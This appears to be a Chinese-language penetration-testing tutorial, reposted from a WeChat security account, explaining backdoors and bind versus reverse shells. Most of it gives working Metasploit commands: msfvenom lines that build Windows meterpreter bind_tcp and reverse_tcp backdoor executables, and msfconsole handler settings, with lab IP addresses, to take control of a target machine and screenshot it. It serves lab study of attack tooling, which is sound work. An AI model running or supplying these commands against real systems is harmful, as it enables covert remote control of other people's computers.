1、什么是后门?
后门,是一个系统的作者故意留下的、只有作者自己知道的机关。
比如,一个洞府看起来是铜墙铁壁,但是若在它前面前念一声"芝麻开门!"便会在墙壁上凭空打开一个门。这便是一个后门,这是系统的作者故意留下的机关。
再比如,打开手机拨号键盘,正常使用的话就可以拨打电话。但是,若连续输入 *#06# ,变进入了特殊的处理程序: 显示当前手机序列号。这也是一个后门,是系统作者故意留下的手段。
可见,普通人无法看到后门的存在,但系统的作者知道后门在哪里。在输入特殊的指令后,便打开了后门,进入特殊的处理分支。注意重点: 只有作者自己知道这个指令!
2、简单说说后门的2种获取Shell方式?
就是控制端监听在某TCP/UDP端口,被控制端主动连接控制端的这一端口,控制端可以通过这一端口进行相关命令操作。像telnet,ssh这些可以理解为正向shell,控制端主动连通控制端,而反向shell则是正向shell的向。
正向shell:控制端主动发起连接去连接被控制端。
反向shell:被控制端主动连接控制端。
3、如何制作后门?
如何制作正向连接后门?使用如下命令
msfvenom -p windows/meterpreter/bind_tcp -f exe -o backdoor.exe
#msfvenom(msf不用说,venom是古老而又经典著名的免杀方式)-p(选择payload,也就是攻击荷载)windows/meterpreter/bind_tcp(正向payload目录)-f exe(生成方式为exe)-o backdoor.exe(输出名称为backdoor.exe)
生成成功,默认保存在/root/下。
如何制作反向后门?使用如下命令
msfvenom -p windows/meterpreter/reverse_tcp -f exe -o backdoorfanxiang.exe
#细心的同学已经看出来了,大致没什么不一样,就是换了个payload,换了个输出名。payload必须换,输出名字不必须,只是为了区分。
4、如何使用后门?
如何使用正向后门?将后门上传至靶机。
运行它,再去kali上加载、配置监听模块,才能入侵靶机。配置命令如下
msfconsole #进入msf
use /exploit/multi/handler #加载监听模块
set payload windows/meterpreter/bind_tcp #设置payload为此正向payload
set rhost 192.168.203.137 #将远程主机地址设置为靶机ip
exploit或者run #运行模块
可以看到入侵成功,最后为了证明成功,我是用screenshot命令截了一张靶机的屏幕保存在/root/下
如何使用反向后门?将后门上传至靶机。
先不要运行。先准备好监听模块再运行!
msfconsole #进入msf
use /exploit/multi/handler #加载监听模块set payload windows/meterpreter/reverse_tcp #设置payload为此反向payload
ifconfig #查看KaliLinux的ip地址
set lhost 192.168.203.136 #因为是反向,让靶机主动连接我们,所以设置自己的ip
exploit或者run #开始运行监听模块
之后运行 后门文件此时返回
原文始发于微信公众号(盐酸网络安全):msf制作后门
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论